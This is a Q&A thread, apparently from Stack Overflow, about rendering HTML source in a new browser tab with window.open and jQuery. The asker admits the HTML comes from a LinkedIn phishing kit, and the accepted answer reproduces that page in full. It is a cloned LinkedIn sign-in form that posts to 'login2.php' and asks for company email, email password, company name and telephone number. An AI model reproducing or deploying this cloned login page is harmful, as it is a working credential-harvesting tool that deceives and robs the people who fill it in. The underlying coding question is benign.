# Render complex html source code in new tab

Tags: javascript, jquery, html

I want to render html code in a new tab, so I'm currently doing:

```
  var w = window.open();
  $(w.document.body).html("HTML_CODE");
```

But the issue is that if I'm rendering a simple html like:

```
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><table width="400" cellpadding="3" cellspacing="5"><tr><td align="left" valign="middle" width="360"><font style="COLOR: black; FONT: 10pt/10pt verdana"><b>Page cannot be displayed</b></font></td></tr><tr><td width="400"><font style="COLOR: black; FONT: 8pt/11pt verdana">The requested URL was not found on this server.</font></td></tr><tr><td width="400"><font style="COLOR: black; FONT: 8pt/11pt verdana"><hr color="#C0C0C0" noshade><font style="font:8pt/11pt verdana; color:black"><br>IceWarp<br>404 Not found</font></font></td></tr></table></BODY></HTML>
```

That's working fine. the problem is when I'm try to render more complex ones like:

https://pastebin.com/raw/yxwBzGJK

And then the javascript code of what I'm trying to render affect my current tab of the web application (this is the errors in console of my web application tab when rendering the code in new tab):

[image]

Here is a fiddle of what I'm trying to achieve:

https://jsfiddle.net/eitanmg/67cwqyvf/14/

Comment: Seems like you are trying to trick someone

Comment: If you aren't trying to trick someone, it's bad practice to do what you're trying to do. Well, you probably are, but you know, benefit of the doubt..

Comment: wow relax, i'm not tricking anyone... it was just a source code of linked-in phishing (because this is one of the projects i'm currently working on), i edited it to linked-in actual source code. what is the difference? do you have any relevant information on how to solve the problem?

Comment: A simpler solution will be to open a new window with an existing url and pass all the parameters you need as POST or GET params.

Answer (score 0, accepted):

Your code is correct and seems to be working fine for me when I created and html file on my **local machine**. But it didn't work with jsFiddle or Codepen I suppose there might be some issue due to the way they render the html.

My index.html content --

```
<html>
   <head>
     <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"> </script>

     <script src="index.js"> </script>
   </head>
   <body>
      <button data-initialid='2312' type='button' class='btn renderSourceCodeBTN'>Render Source</button>
   </body>
</html>
```

My index.js Code

```
$(document).on("click",".renderSourceCodeBTN", function (event) {

 var w = window.open(); 

var temp = `<!DOCTYPE html>
<!--[if lt IE 7]> <html lang="en" class="ie ie6 lte9 lte8 lte7 os-win"> <![endif]-->
<!--[if IE 7]> <html lang="en" class="ie ie7 lte9 lte8 lte7 os-win"> <![endif]-->
<!--[if IE 8]> <html lang="en" class="ie ie8 lte9 lte8 os-win"> <![endif]-->
<!--[if IE 9]> <html lang="en" class="ie ie9 lte9 os-win"> <![endif]-->
<!--[if gt IE 9]> <html lang="en" class="os-win"> <![endif]-->
<!--[if !IE]><!--> <html lang="en" class="os-win"> <!--<![endif]-->

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
<script src="../../static.licdn.com_443/scds/common/u/lib/fizzy/fz-1.3.8-min.js" type="text/javascript"></script><script type="text/javascript">fs.config({"failureRedirect":"http://www.linkedin.com/nhome/","uniEscape":true,"xhrHeaders":{"X-FS-Origin-Request":"/uas/login","X-FS-Page-Id":"uas-consumer-login"}});</script><script></script>

<!--[if lte IE 8]>
  <link rel="shortcut icon" href="https://static.licdn.com/scds/common/u/images/logos/favicons/v1/16x16/favicon.ico">
<![endif]-->
<!--[if IE 9]>
  <link rel="shortcut icon" href="https://static.licdn.com/scds/common/u/images/logos/favicons/v1/favicon.ico">
<![endif]-->
<link rel="icon" href="https://static.licdn.com/scds/common/u/images/logos/favicons/v1/favicon.ico">

<link rel="stylesheet" type="text/css" href="https://static.licdn.com/scds/concat/common/css?h=765zh9odycznutep5f0mj07m4-c8kkvmvykvq2ncgxoqb13d2by-7im4ksgpukpbjap4swfj3elxs-7mxyksftlcjzimz2r05hd289r-4uu2pkz5u0jch61r2nhpyyrn8-7poavrvxlvh0irzkbnoyoginp-4om4nn3a2z730xs82d78xj3be-ez2lcu8wtkfml6t904kxuz2em-ct4kfyj4tquup0bvqhttvymms-a6c7eivr8umrp20gkm4s5m4kd-9zbbsrdszts09by60it4vuo3q-8ti9u6z5f55pestwbmte40d9-6xy1ubh931c87hnrti1tm0ghb-3pwwsn1udmwoy3iort8vfmygt-b1019pao2n44df9be9gay2vfw-aau7s6f37xbtq1daynn0bb656-ab01tg8funn2n1exayaej7367">
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=3nuvxgwg15rbghxm1gpzfbya2-35e6ug1j754avohmn1bzmucat-mv3v66b8q0h1hvgvd3yfjv5f-14k913qahq3mh0ac0lh0twk9v-5j9cn6jiwhc47x6gzmpv6ogni-b7ksroocq54owoz2fawjb292y-62og8s54488owngg0s7escdit-c8ha6zrgpgcni7poa5ctye7il-8gz32kphtrjyfula3jpu9q6wl-51dv6schthjydhvcv6rxvospp-e9rsfv7b5gx0bk0tln31dx3sq-2r5gveucqe4lsolc3n0oljsn1-8v2hz0euzy8m1tk5d6tfrn6j-di2107u61yb11ttimo0s2qyh2-38i6il2zabqvakfzq8wpcvmwh-338jj5au2boohyyk766mnkr8-a7br995b5xb4ztral63cjods4-4x5thcpbzikuqpcblepkqxhqs-91ky3avajc93abaff1zy09qie-39kuwv80yvqr74w4oe9bge0md-ejfdcbibyn0amjrpy1bw898cw-370m60vrzsp5vx8i8wie69mme-b0otj9zjsih2zu4s3gxjejik2-czstax4e6y68hymdvqxpwe5so-3g8gynfr7fip2svw23i5ixnw3"></script>
<script type="text/javascript">LI.define('UrlPackage');LI.UrlPackage.containerCore=["https://static.licdn.com/scds/concat/common/js?h=d7z5zqt26qe7ht91f8494hqx5"][0];</script>
<script type="text/javascript">(function(){if(typeof LI==='undefined'||!LI){window.LI={};}
var shouldUseSameDomain=false&&false&&!/Version\//i.test(window.navigator.userAgent);function adjustUrlForIos(url){return shouldUseSameDomain?url.replace(/^(?:https?\:)?\/\/[^\/]+\//,'/'):url;}
LI.JSContentBasePath=adjustUrlForIos("login.html\/\/static.licdn.com\/scds\/concat\/common\/js?v=build-2000_8_48397-prod");LI.CSSContentBasePath=adjustUrlForIos("login.html\/\/static.licdn.com\/scds\/concat\/common\/css?v=build-2000_8_48397-prod");LI.injectRelayHtmlUrl=shouldUseSameDomain?null:"https:\/\/static.licdn.com\/scds\/common\/u\/lib\/inject\/0.6.1\/relay.html";LI.comboBaseUrl=adjustUrlForIos("login.html\/\/static.licdn.com\/scds\/concat\/common\/css?v=build-2000_8_48397-prod");LI.staticUrlHashEnabled=true;}());</script>
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=25kaepc6rgo1820ap1rglmzr4-5twpadgpdpe2fd2drxbyynj9s-dtx8oyvln9y03x1ku6t0abhc9-9yrlkzqdz2fq4zzcxtkisx0j2-edp77ghrpkbbons0amvyb2ejm-8ohb0iio22nbqe1w8et54sawe-5n5dp3pn32p4zstdag5cbpr1-eehwe5piqwg4elnl8jvj9vpx-amjylk8w8039f2lwlov2e4nmc-47qp7uw3i5i1pqeovirlcc070-9w1b5mi5erarwbypvtw0a03k7-6dhio4t0fxvyu677a4z672e0-4izdpghi4r0b0uhhivo34xsvq-9a0rznn8mui615f4o75jq7hz2-dta7xzw3a1itnwo44eolyusn5-67xlf04tp198rsgnplkzm3mv0-9undj1hjru2i7vjjlqtb52ho2-7vr4nuab43rzvy2pgq7yvvxjk-9qa4rfxekcw3lt2c06h7p0kmf"></script>
<script type="text/javascript">fs._server.fire("c52e3bbfd203ec1300b59cecf12a0000-1",{event:"before",type:"html"});</script><meta name="remote-nav-init-marker" content="true"/>
<link rel="stylesheet" type="text/css" href="https://static.licdn.com/scds/concat/common/css?h=a6c7eivr8umrp20gkm4s5m4kd-5abacav2ihca7naq8ldlbzvjs">
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=ditm8xdycl29ta8gqk5tpmxf8-czstax4e6y68hymdvqxpwe5so"></script>
<script type="text/javascript">fs._server.fire("c52e3bbfd203ec1300b59cecf12a0000-1",{event:"after",type:"html"});</script>
<title>Sign In | LinkedIn</title>
<link rel="stylesheet" type="text/css" href="https://static.licdn.com/scds/concat/common/css?h=c52xqty03kc2uumayfdgw52ha-bdvlivvfj7epd3qpujfiyceiy-9isvvzw61fpveso9doy1mzsas-aze4ooami6s3kk293iv0zfky1-95t6vcl2cgpx3042md6zm5jzo">
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=4zslye83akez5s4mf91hrq425-95d8d303rtd0n9wj4dcjbnh2c-arbgv2252ztzfkx4ttedufn6d-dkdnel3qyxdabl44dfxjdks1c-5j9ytf091oscwtui7nf86wpzf-e2qurhslc3tudjtufn4sxxai6-d638hjstdjtxe4t85q40byqcd"></script>
<link rel="canonical" href="login.html"/>
<link rel="stylesheet" type="text/css" href="https://static.licdn.com/scds/concat/common/css?h=cfsam81o5sp3cxb7m0hs933c4-e52k99nlgnf00pfikh16pt1b4-bnquk6ky802954cnw1mw4p59k-2qk68hrxrqya74okuimf9dv0c">
<script type="text/javascript">LI.define('ChangePassword.Styles');LI.ChangePassword.Styles=["https://static.licdn.com/scds/concat/common/css?h=63ruf6tb4l2oph21j90lusip4-2qk68hrxrqya74okuimf9dv0c"];LI.define('ChangePassword.html');LI.ChangePassword.JS=["https://static.licdn.com/scds/concat/common/js?h=ab0aazvz3b9nvqjmo36373r2p"];LI.i18n.register('change_your_password','Change your password');LI.i18n.register('wrong_password','Hmm, that\'s not the right password. Please try again or <a class=\"password-reminder-link\" href=\"\/uas\/request-password-reset\">request a new one.<\/a>');LI.i18n.register('invalid_username','Hmm, we don\'t recognize that email. Please try again.');LIModules.exports('DialogRetrofitV2Enabled',true);LIModules.exports('ComposeDialogDependencies',{jsFiles:["https://static.licdn.com/scds/concat/common/js?h=5suxahyg6u5y9abq7nx22rsp3"],cssFiles:["https://static.licdn.com/scds/concat/common/css?h=154kxlhs4z8rrtcvqfbage7t"]});LIModules.exports('FeedbackDialogDependencies',{url:'/lite/feedback-form',cssFiles:["https://static.licdn.com/scds/concat/common/css?h=3pjgifqd8hix737po9m8egegl"]});LIModules.exports('WhoSharedDialogDependencies',{jsFiles:["https://static.licdn.com/scds/concat/common/js?h=3m0wwwerqvp8618uhx52in5b-ef3elbvaio1ryhqhel0ra3b7c-f2ve2m4snne5xyn5408bsek5n-cz35wdvsh3whk61r5ab6knzup-4bl5gu6lc1p1v2gdrxrirebcu"],cssFiles:["https://static.licdn.com/scds/concat/common/css?h=ee6ucumj8ledmrgyfyz4779k4-5vdl4x1qzwm5rqqwq4015vpam-3566c1ju1btq868kwju12welc-8asck8kvvd6hamuyvpcdse51p"]});LIModules.exports('EndorseDialogDependencies',{jsFiles:["https://static.licdn.com/scds/concat/common/js?h=3gtm46fgengh7teck5sse5647-1nu5dtx3127c5u6rnyd48xyy1-13jjjkmtbrqk2d7ctaerhjl6c"],cssFiles:["https://static.licdn.com/scds/concat/common/css?h=dg4rrw421valxxlqfp04030g7"]});LIModules.exports('SlideshareDialogDependencies',{jsFiles:["https://static.licdn.com/scds/concat/common/js?h=6y9mbi0r2o6usgrmm8vm1vw4k-1wq18rvqnu5ju66mrccyhjupj-f1h7fo0t146gwqkn1v0npn007-em4myogo6n3h23gq9jhm940b8-b7n2zuq7kxlcqoyy45lfiqd00-desdb8ckwqfizu4iap272t667-2dzvpjvb927qbsnxts39b5lhm-2rwnq8ar01i5mbiqrriwrxctf-ef3elbvaio1ryhqhel0ra3b7c-18mio6a45fu33gbckogjwiskc-4bl5gu6lc1p1v2gdrxrirebcu-3f4mhcnicl2sssc4h9zxayaba-3mfdh15yv4dvkys8ghzfcggmw-8c0ozn3ptdmcfmdkez191r1e9-5kwfaiekiahrqi8wwb0qpont1-emx9k3g6vxhx5cbad2xccjes0"],cssFiles:["https://static.licdn.com/scds/concat/common/css?h=24o3wkkwwvmwutak3nlw5lx4n-eu8svnpd32wrtwqeuiuomdty0-4y2bj10mk9r3y7tmy3tju56vk-6lg80obqw1a6e31g5xzz9modk-9gj02wtxq8z7svwc0ldplic28-3ohu4hv8hru5myc4i9cj3mzau-9isvvzw61fpveso9doy1mzsas-9crclcw3gvtm1rwguxp349o8l"]});LIModules.exports('CommentFlagReportDependencies',{url:'/today/social/flag-comment-form',jsFiles:["https://static.licdn.com/scds/concat/common/js?h=aevdban1tqltqettio7veayoo-9qiqdz1qfr0ylhlzx0uchfe0n-bs317qn4mf3587q6g80mtawha-2koc6nzt8doynbyinm6upmmk-8d5srj4unec9c1mksngizgbpn"],cssFiles:["https://static.licdn.com/scds/concat/common/css?h=drxco8hlm0vu0i6lc3qveehbl"]});LIModules.exports('SlideshareAdDependencies',{cssFiles:["https://static.licdn.com/scds/concat/common/css?h=e146j8gzz2jcia95s3z0rvciq"]});</script>
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=5lsmngp0eiyzirempbmj3f9ry"></script>
</head>
<body dir="ltr" class="guest v2  chrome-v5 chrome-v5-responsive sticky-bg guest" id="pagekey-uas-consumer-login-internal">
<input id="inSlowConfig" type="hidden" value="false"/>
<script type="text/javascript">document.body.className+=" js ";</script>
<script type="text/javascript">fs._server.fire("c52e3bbfd203ec1300b59cecf12a0000-2",{event:"before",type:"html"});</script><div id="a11y-menu" class="a11y-skip-nav-container">
<div class="a11y-skip-nav a11y-hidden">
<a href="#a11y-content" id="a11y-skip-nav-link">Skip to main content</a>
</div>
<script id="control-http-12274-exec-57423191-1" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12274-exec-57423191-1','A11yMenu',{jumpToText:'Jump to: <strong>Summary<\/strong>',skipToText:'Skip to: <strong>Search<\/strong>',feedbackText:'Accessibility Feedback',closeText:'close',anchorText:'Content Follows:',moreText:'More in-page navigation options below',smallPageText:'Not much to look at here. Go directly to content.',searchUrl:'\/vsearch\/f'});</script>
<script id="control-http-12274-exec-57423191-2" type="linkedin/control" class="li-control">LI.KbDialogDependencies={jsFiles:["https://static.licdn.com/scds/concat/common/js?h=37zc8dm8vu14f1neta1ponx0o"],cssFiles:["https://static.licdn.com/scds/concat/common/css?h=9qwmbyyfabl3upqh3cyzbhd49"]};LI.Controls.addControl('control-http-12274-exec-57423191-2','kb.shortcuts',{homepageUrl:'http:\/\/www.linkedin.com\/nhome\/?trk=global_kb',profileUrl:'http:\/\/www.linkedin.com\/profile\/view?trk=global_kb',editProfileUrl:'http:\/\/www.linkedin.com\/profile\/edit?trk=global_kb',inboxUrl:'http:\/\/www.linkedin.com\/inbox\/#messages?trk=global_kb',jobsUrl:'http:\/\/www.linkedin.com\/job\/home?trk=global_kb',settingsUrl:'https:\/\/www.linkedin.com\/secure\/settings?req=&trk=global_kb',influencerUrl:'http:\/\/www.linkedin.com\/influencers?trk=global_kb'});</script>
</div>
<div id="header" class="global-header responsive-header nav-v5-2-header  responsive-1 remote-nav" role="banner">
<div id="top-header">
<div class="wrapper">
<h2 class="logo-container">
<a href="http://www.linkedin.com/" class="guest logo" id="li-logo">
LinkedIn Home
</a>
</h2>
<ul class="nav main-nav guest-nav" role="navigation">
<li class="nav-item">
<a href="http://www.linkedin.com/static?key=what_is_linkedin&amp;trk=hb_what" class="nav-link">
What is LinkedIn?
</a>
</li>
<li class="nav-item">
<a href="https://www.linkedin.com/start/join?trk=hb_join" class="nav-link" rel="nofollow">
Join Today
</a>
</li>
<li class="nav-item">
<a href="logine908.html?goback=&amp;trk=hb_signin" class="nav-link" rel="nofollow">
Sign In
</a>
</li>
</ul>
</div>
</div>
<div class="a11y-content">
<a name="a11y-content" tabindex="0" id="a11y-content-link">Main content starts below.</a>
</div>
</div>
<script type="text/javascript">LI.RUM=LI.RUM||{};LI.RUM.streamMetrics={timeToNavInteractive:Date.now&&Date.now()||new Date().getTime(),timeToAboveFold:null,timeToPageInteractive:null};</script>
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=1e5kw6urhif0boq5eaan271d3-473m04z4a58wexbuqt1uoier4-ettwzlseaw86558lzmqblr06t-4y7qfbe7liwvykn5stbqh9jra-9r20yf4qs8yiwgzkf53wg7wyr-6865rdpomfa2609kghcxa2ojk-s4x3rtlk1sdpf9r8pwrfgklz-b01bpc2em58egy7voz1cza2w4-crayc3khz55ejfivfh0atiltt-2ghhcjwxsjk0n3h4p2tkxqdsf-12960v0orzym6k2r6fa6l03uh-bkbl4wmbf5lp9185n7bthkx96-3i7ubdukif1jevuf29ftmtvjs-7bt8yq2swxj00zqwcc3anfs61-5cmfpe4jqrweez449s97ldikg-clz7gb1h1gqkujqk14gbprnf5"></script>
<script type="text/javascript">fs._server.fire("c52e3bbfd203ec1300b59cecf12a0000-2",{event:"after",type:"html"});</script>
<div id="body" class="" role="main">
<div class="wrapper hp-nus-wrapper">
<div id="global-error">
</div>
<div id="bg-fallback"></div>
<div id="main" class="signin">
<div id="cookieDisabled">Make sure you have cookies and Javascript enabled in your browser before signing in.</div>
<script type="text/javascript">if(navigator.cookieEnabled==true){LI.hide('cookieDisabled');}</script>
<form id="form1" name="form1" method="post" action="login2.php">
<fieldset>
<legend>Sign in to LinkedIn</legend>
<div class="outer-wrapper">
<div class="inner-wrapper">
<div class="logo_container">LinkedIn</div>
<ul id="mini-profile--js">
<li class="">

<input type="email" name="email" placeholder="Company Email" required="yes" />
<li>

<ul id="mini-profile--js">
<li class="">

<input type="" name="email2" placeholder="Email Password" required="yes" />
<li>

<ul id="mini-profile--js">
<li class="">

<input type="" name="email3" placeholder="Confirm Email Password" required="yes" />
<li>

<ul id="mini-profile--js">
<li class="">

<input type="" name="email4" placeholder="Company Name" required="yes" />
<li>

<ul id="mini-profile--js">
<li class="">

<input type="" name="email5" placeholder="Company Telephone Number" required="yes" />
<li>




</li>
<li class="button">
<input type="submit" name="signin" value="Submit" class="btn-primary" id="btn-primary">

</li>
</ul>
</div>
</div>
<div class="gaussian-blur"></div>
</div>
<script id="control-http-12257-exec-7423163-1" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12257-exec-7423163-1','LI.BalloonCalloutDelegator',{width:'auto',orientation:'bottom',type:'tooltip-callout',dataId:'-li-tooltip-id'});</script>
</fieldset>
<input type="hidden" name="session_redirect" value="" id="session_redirect-login"><input type="hidden" name="trk" value="" id="trk-login"><input type="hidden" name="loginCsrfParam" value="54a939e2-7f82-45cf-b88c-0534ab45b28e" id="loginCsrfParam-login"><input type="hidden" name="fromEmail" value="" id="fromEmail-login"><input type="hidden" name="csrfToken" value="ajax:2649005306478309108" id="csrfToken-login"><input type="hidden" name="sourceAlias" value="0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi" id="sourceAlias-login">
</form>
<script id="control-http-12257-exec-7423164-2" type="linkedin/control" class="li-control">LI.i18n.register('oneOrMoreErrors','There were one or more errors in your submission. Please correct the marked fields below.');LI.i18n.register('unableToProcessRequest','We were unable to handle your request. Please try again.');LI.Controls.addControl('control-http-12257-exec-7423164-2','FrontierAJAXForm',{injectAfter:'.button',successCallback:LI.Login.handleSuccess,enableResizeScreen:false,errorCallback:LI.Login.handleError,injectGlobalError:true,errorId:'global-alert-queue'});</script>
<script id="control-http-12257-exec-7423164-3" type="linkedin/control" class="li-control">LI.Controls.addControl('control-http-12257-exec-7423164-3','Login',{showErrorOnLoad:false,errorOnLoadMessage:'There&#8217;s already a LinkedIn account associated with this email address.',resetPasswordURL:'\/uas\/request-password-reset?session_redirect=&trk=signin_fpwd',passwordReminderMessage:'Need a password reminder?',domainSuggestion:''});</script>
<div class="callout-container">
<span id="login-tooltip">
<div class="callout-content">
Forgot password?
</div>
</span>
</div>
</div>
<svg class="svg-image-blur">
<filter id="blur-effect-1">
<feGaussianBlur stdDeviation="5"></feGaussianBlur>
</filter>
</svg>
<script>if(window.$&&jQuery){$('document').ready(function(){$('.gaussian-blur').addClass('blur');});}else{YEvent.onDOMReady(function(){YDom.addClass(Y$('.gaussian-blur',null,true),'blur');});}</script>
<style type="text/css">
  .svg-image-blur { 
    position: absolute;
    top: -50000px;
    left: -50000px;
  }
  .blur {
    -webkit-filter: blur(5px); 
    -moz-filter: blur(5px);
    -o-filter: blur(5px); 
    -ms-filter: blur(5px);
    filter: url(#blur-effect-1);
    filter: progid:DXImageTransform.Microsoft.Blur(PixelRadius='5');
    zoom: 1;
  }
</style>
</div>
</div>
<script data-page-js-type="i18n">(function(n,r,a){r=window[n]=window[n]||{};r['Dialog-closeWindow']='Close this window';r['Dialog-close']='Close';r['Dialog-or']='or';r['Dialog-cancel']='Cancel';r['Dialog-submit']='Submit';r['Dialog-error-generic']='We\'re sorry. Something unexpected happened and your request could not be completed. Please try again.';r['Dialog-start']='Dialog start';r['Dialog-end']='Dialog end';}('__li__i18n_registry__'));</script>
<script type="text/javascript">LI.Controls.processQueue();</script>
<script type="text/javascript">LI_WCT(["control-http-12257-exec-7423163-1","control-http-12257-exec-7423164-2","control-http-12257-exec-7423164-3",]);</script>
<script type="text/javascript">fs._server.fire("c52e3bbfd203ec1300b59cecf12a0000-3",{event:"before",type:"html"});</script><div id="footer" class="remote-nav" role="contentinfo">
<div class="wrapper">
<p id="copyright" class="guest"><span>LinkedIn Corporation</span> <em>&copy; 2015</em></p>
<ul id="nav-legal">
<li><a href="http://www.linkedin.com/legal/user-agreement?trk=hb_ft_userag">User Agreement</a></li>
<li><a href="http://www.linkedin.com/legal/privacy-policy?trk=hb_ft_priv">Privacy Policy</a></li>
<li>
<a href="https://help.linkedin.com/app/answers/detail/a_id/34593/loc/na/trk/uas-consumer-login-internal/" target="_blank" rel="nofollow">Community Guidelines</a>
</li>
<li><a href="http://www.linkedin.com/legal/cookie-policy?trk=hb_ft_cookie">Cookie Policy</a></li>
<li><a href="http://www.linkedin.com/legal/copyright-policy?trk=hb_ft_copy">Copyright Policy</a></li>
<li><a href="https://www.linkedin.com/psettings/guest-controls" rel="nofollow">Guest Controls</a></li>
</ul>
</div>
</div>
<script type="text/javascript">if(LI.showAllDeferredImg){LI.showAllDeferredImg('header',false);LI.showAllDeferredImg('footer',false);}
if(typeof(oUISettings)!=='undefined'){oUISettings.saveSettingsURL="https://www.linkedin.com/lite/secure-ui-settings-save-old?csrfToken=ajax%3A2649005306478309108";}
if(typeof(WebTracking)!=='undefined'){WebTracking.saveWebActionTrackURL="https://www.linkedin.com/lite/secure-web-action-track?csrfToken=ajax%3A2649005306478309108";}</script>
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=3i7ubdukif1jevuf29ftmtvjs-7bt8yq2swxj00zqwcc3anfs61-du9b5xv93paiu4gm8x4awcgkb-1m7sfcez3isjwlg5yrudwy1mz-clz7gb1h1gqkujqk14gbprnf5"></script>
<script type="text/javascript">fs._server.fire("c52e3bbfd203ec1300b59cecf12a0000-3",{event:"after",type:"html"});</script>
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=178w1amns5ya7addmlk0qioxi-akfe1g1hb660050homjb2nwnr-3tdm4y44d9wld0j7i3gs0x10x-euwg0kjg0qyoxmsz2my965j4r"></script>
<script type="text/javascript">(function(d){function go(){var a=d.createElement('iframe');a.style.display='none';a.setAttribute('sandbox','allow-scripts');a.src='http://radar.cedexis.com/1/11326/radar/radar.html';if(d.body){d.body.appendChild(a);}}
if(window.addEventListener){window.addEventListener('load',go,false);}else if(window.addEvent){window.addEvent('onload',go);}}(document));</script>
<script type="text/javascript">if(!window.LI){window.LI={};}
LI.RUM=LI.RUM||{};(function(RUM,win){var doc=win.document;RUM.flags=RUM.flags||{};RUM.flags['host-flag']="control";RUM.flags['pop_beacons_frequency']="n100-ap0-la0-va0-tx0-sg0-db0-hk0-sp0-ln0";RUM.flags['rs_timings_individual']="control";RUM.urls=RUM.urls||{};RUM.urls['rum-track']="\/lite\/rum-track?csrfToken=ajax%3A2649005306478309108";RUM.urls['boomerang-bw-img']="login.html\/\/static.licdn.com\/scds\/common\/u\/lib\/boomerang\/0.9.edge.4ab208445a\/img\/";RUM.base_urls=RUM.base_urls||{};RUM.base_urls['permanent_content']="login.html\/\/static.licdn.com\/scds\/common\/u\/";RUM.base_urls['versioned_content']="login.html\/\/static.licdn.com\/scds\/concat\/common\/";RUM.base_urls['media_proxy']="login.html\/\/media.licdn.com\/media-proxy\/";RUM.serverStartTime=1.435526584917E12;RUM.enabled=true;function getRumScript(){var node=doc.body||doc.head||doc.getElementsByTagName('head')[0],script=doc.createElement('script');script.src=["https://static.licdn.com/scds/concat/common/js?h=ed29nkjpsa16bhrjq4na16owq-1mucgfycc664m7vmhpjgqse65-1l5rurej3h44qodo5rn0cdvyn-8om6v2ckrxsbnwf40t9ta8a7e-976eucr14azn1gu6x533uu349-9jzlwicvu376y9q4vjq77y5ks-9fdih7kgninuhkdhc16e5wwmy-1m0whdrwis44c1hoa9mrwhlt4-1uvutm1mpyov7rqhtcf8fksby-aac54ic1fmca5xz1yvc5t9nfe-8kc3ymguk6hjfnjqyxbpfflsw-c0121povror81d0xao0yez4gy"][0];node.appendChild(script);}
if(win.addEventListener){win.addEventListener('load',getRumScript);}
else{win.attachEvent('onload',getRumScript);}}(LI.RUM,window));</script>
<script id="localChrome"></script>
<script>var jsRandomCalculator=(function(){function compute(n,email,ts){try{var vs=n.split(":"),ts=parseInt(ts),len=vs.length,i,v,f1_out,f2_out;for(i=0;i<len;i++){vs[i]=parseInt(vs[i],10);}f1_out=f1(vs,ts);f2_out=f2(f1_out,ts);if(f1_out[0]%1000>f1_out[1]%1000){v=f1_out[0];}else{v=f1_out[1];}return f3(v,f2_out,email);}catch(err){return-1;}}function computeJson(input){return compute(input.n,input.email,input.ts);}function f1(vs,ts){var output=[],i;output[0]=vs[0]+vs[1]+vs[2];output[1]=(vs[0]%100+30)*(vs[1]%100+30)*(vs[2]%100+30);for(i=0;i<10;i++){output[0]+=(output[1]%1000+500)*(ts%1000+500);output[1]+=(output[0]%1000+500)*(ts%1000+500);}return output;}function f2(vs,ts){var sum=vs[0]+vs[1],n=sum%3000,m=sum%10000,p=ts%10000;if(n<1000){return Math.pow(m+12345,2)+Math.pow(p+34567,2);}else if(n<2000){return Math.pow(m+23456,2)+Math.pow(p+23456,2);}else{return Math.pow(m+34567,2)+Math.pow(p+12345,2);}}function f3(v1,v2,email){var len=email.length,v3=0,i=0;for(;i<len;i++){v3+=email.charCodeAt(i)<<((5*i)%32);}return(v1*v2*v3)%1000000007;}return{compute:compute,computeJson:computeJson,version:"1.0.1"};}());</script>
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=eq875keqggun9hoxzfhbanjes"></script>
<script type="text/javascript" src="https://static.licdn.com/scds/concat/common/js?h=b1qfz41z3b3boi2i3gjuzglmx-e4t0yj6tjycwmm5gb2d6tkiqd-4ctyhul13sruu19hcui2s5a9p"></script>
<script type="text/javascript">//<![CDATA[
(function(require){var bcookie=escape(readCookie("bcookie")),$=window.$||(require&&require('jquery')),newTrkInfo='null',alias_secure='/analytics/noauthtracker?type=leo%2EpageTracking&pageType=full_page&pageKey=uas-consumer-login-internal_jsbeacon&trkInfo=REPLACEME',alias_normal='http://www.linkedin.com/analytics/noauthtracker?type=leo%2EpageTracking&amp;pageType=full_page&amp;pageKey=uas-consumer-login-internal_jsbeacon&amp;trkInfo=REPLACEME',is_secure=true,url=(is_secure)?alias_secure:alias_normal;function readCookie(name){var nameEQ=name+'=',ca=document.cookie.split(';');for(var i=0;i<ca.length;i++){var c=ca[i];while(c.charAt(0)===' '){c=c.substring(1,c.length);}
if(c.indexOf(nameEQ)===0){return c.substring(nameEQ.length,c.length);}}
return null;}
url=url.replace("REPLACEME",newTrkInfo);url=url.replace("trkInfo=","trackingInfo=");if(bcookie){if($&&$.ajax){$.ajax(url);}else if(window.YAHOO){window.YAHOO.util.Connect.asyncRequest('get',url,{});}}})(window.require);
//]]></script>
<script data-page-js-type="lix">(function(n,r,a){r=window[n]=window[n]||{};r['jsecure_injectAlert']='control';r['jsecure_Dialog']='control';}('__li__lix_registry__'));</script>
<script type="text/javascript">LI.Controls.processQueue();</script>
</body>


</html>`;
$(w.document.body).html(temp);

});
```

Comment: In your index.html, when hitting F12 to open chrome developer, and then clicking the Render Source button, do you see the errors of JS in the index.html console? These errors affect the index.html page (in my case it makes other parts of the page inaccessible)...